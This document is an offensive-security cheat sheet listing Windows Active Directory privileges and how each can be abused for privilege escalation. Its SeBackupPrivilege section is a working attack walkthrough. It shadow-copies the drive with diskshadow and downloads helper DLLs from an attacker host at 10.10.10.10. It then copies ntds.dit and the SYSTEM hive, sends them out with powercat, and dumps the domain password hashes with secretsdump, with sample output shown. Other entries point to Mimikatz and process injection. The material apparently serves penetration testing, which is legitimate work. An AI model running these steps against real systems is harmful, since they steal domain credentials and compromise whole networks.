Privileged Accounts and Groups in Active Directory

Your Best Friend

whoami /PRIV

User Rights and Privileges

SePwnVector

• SeTrustedCredManAccessPrivilege

• SeNetworkLogonRight

• SeTcbPrivilege

  • S4U Logon
    • Act as part of the operating system.
    • Allows a process to assume the identity of any user and thus gain access to the resources that the user is authorized to access.
  • PTOKEN_GROUPS parameter in LsaLogonUser() can be modified
    • The calling process may request that arbitrary additional accesses be put in the access token.
  • Impersonate threads or processes

• SeMachineAccountPrivilege

• SeIncreaseQuotaPrivilege

• SeInteractiveLogonRight

• SeRemoteInteractiveLogonRight

• SeBackupPrivilege

  • Allows the user to circumvent file and directory permissions to backup the system. The privilege is selected only when the application attempts to access through the NTFS backup application interface. Otherwise normal file and directory permissions apply.”
  • reg save HKLM\SYSTEM c:\temp\system.hive
  • reg save HKLM\SAM c:\temp\sam.hive
  • secretsdump.py -sam sam.hive -system system.hive LOCAL
  • NinjaCopy
  • Abusing Backup Operators Group with shadow copy

    # Create  script.txt file that will contain the shadow copy process script
    #Script ->{
    set context persistent nowriters  
    set metadata c:\windows\system32\spool\drivers\color\example.cab  
    set verbose on  
    begin backup  
    add volume c: alias mydrive  
    
    create  
    
    expose %mydrive% w:  
    end backup  
    #}
    
    # TRANSFERT TO TARGET SYSTEM
    Invoke-WebRequest -Uri "http://10.10.10.10/script.txt" -OutFile "C:\\windows\\system32\\spool\\drivers\\color\\script.txt"
    
    # EXEC DISKSHADOW
    cd C:\windows\system32\spool\drivers\color
    diskshadow.exe -s script.txt
    
    # CHECK THE CAB
    ls
    -a----         6/7/2020   9:31 PM            743 example.cab
    
    # IMPORTING DLL SeBackupPrivilegeCmdLets & SeBackupPrivilegeUtils
    Invoke-WebRequest -Uri "http://10.10.10.10/SeBackupPrivilegeCmdLets.dll" -OutFile "C:\\windows\\system32\\spool\\drivers\\color\\SeBackupPrivilegeCmdLets.dll"
    Invoke-WebRequest -Uri "http://10.10.10.10/SeBackupPrivilegeUtils.dll" -OutFile "C:\\windows\\system32\\spool\\drivers\\color\\SeBackupPrivilegeUtils.dll"
    Import-Module .\SeBackupPrivilegeCmdLets.dll
    Import-Module .\SeBackupPrivilegeUtils.dll
    
    # CHECK MODULE
    get-help SeBackupPrivilege
    Name                              Category  Module                    Synopsis
    ----                              --------  ------                    --------
    Get-SeBackupPrivilege             Cmdlet    SeBackupPrivilegeCmdLets  ...
    Set-SeBackupPrivilege             Cmdlet    SeBackupPrivilegeCmdLets  ...
    Copy-FileSeBackupPrivilege        Cmdlet    SeBackupPrivilegeCmdLets  ...
    
    #Use the functionality of the dlls to copy the ntds.dit database file from the shadow copy to a location of our choice
    Copy-FileSeBackupPrivilege w:\windows\NTDS\ntds.dit c:\Windows\temp\ntds.dit -Overwrite
    
    # Dump ACTUAL SYSTEM hive
    reg.exe save HKLM\SYSTEM c:\temp\system.hive 
    
    # FILE TRANSFERT
    powercat -c 10.10.10.10 -p 443 -i c:\Windows\temp\system.hive
    powercat -c 10.10.10.10 -p 443 -i c:\Windows\temp\ntds.dit
    
    # REBUILD AD HASHES
    secretsdump.py -ntds ntds.dit -system system.hive LOCAL
    Impacket v0.9.21.dev1+20200313.160519.0056b61c - Copyright 2020 SecureAuth Corporation
    
    [*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
    [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
    [*] Searching for pekList, be patient
    [*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
    [*] Reading and decrypting hashes from ntds.dit 
    Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    DC01$:1000:aad3b435b51404eeaad3b435b51404ee:65557f7ad03ac340a7eb12b9462f80d6:::
    krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
    ...
    

  • If you have SeBackup & SeRestoreprivileges(Backup Operators group) you can set permission and ownership on each file & folder.

• SeChangeNotifyPrivilege

• SeSystemtimePrivilege

• SeTimeZonePrivilege

• SeCreatePagefilePrivilege

• SeCreateTokenPrivilege

  • Allows a process to create an access token by calling token-creating APIs.
  • Create a custom token with all privileges and group membership.

• SeCreateGlobalPrivilege

• SeCreatePermanentPrivilege

• SeCreateSymbolicLinkPrivilege

• SeDebugPrivilege

  • Create a new process and set the parent process a privileged process.
  • Allows the holder to debug another process.
  • Permits read/write memory and change properties of any process (including Local System, administrator...)
  • Load Mimikatz.
  • Inject code into privileged processes in order to perform privileged tasks (VirtualAlloc(), WriteProcessMemory(), CreateRemoteThread(),...)

• SeDenyNetworkLogonRight

• SeDenyBatchLogonRight

• SeDenyServiceLogonRight

• SeDenyInteractiveLogonRight

• SeDenyRemoteInteractiveLogonRight

• SeEnableDelegationPrivilege

• SeRemoteShutdownPrivilege

• SeAuditPrivilege

• SeImpersonatePrivilege

• SeIncreaseWorkingSetPrivilege

• SeIncreaseBasePriorityPrivilege

• SeLoadDriverPrivilege

• SeLockMemoryPrivilege

• SeBatchLogonRight

• SeServiceLogonRight

• SeSecurityPrivilege

• SeRelabelPrivilege

• SeSystemEnvironmentPrivilege

• SeManageVolumePrivilege

• SeProfileSingleProcessPrivilege

• SeSystemProfilePrivilege

• SeUndockPrivilege

• SeAssignPrimaryTokenPrivilege

• SeRestorePrivilege

  • Allows a user to circumvent file and directory permissions when restoring backed-up files and directories“ (but also registry keys)
  • Can write files anywhere, overwrites files, protected system files - even those protected by TrustedInstaller, registry entries...
  • Create a Service DLL.
  • Overwrite Service config in Registry

• SeShutdownPrivilege

• SeSyncAgentPrivilege

• SeTakeOwnershipPrivilege

  • Allows the user to take ownership of any securable object in the system.
  • (SE_OBJECT_TYPE): Files, Printers, Shares, Services, Registry, Kernel objects...
  • SeRestorePrivilege apply.
  • Change Permissions on Registry Key.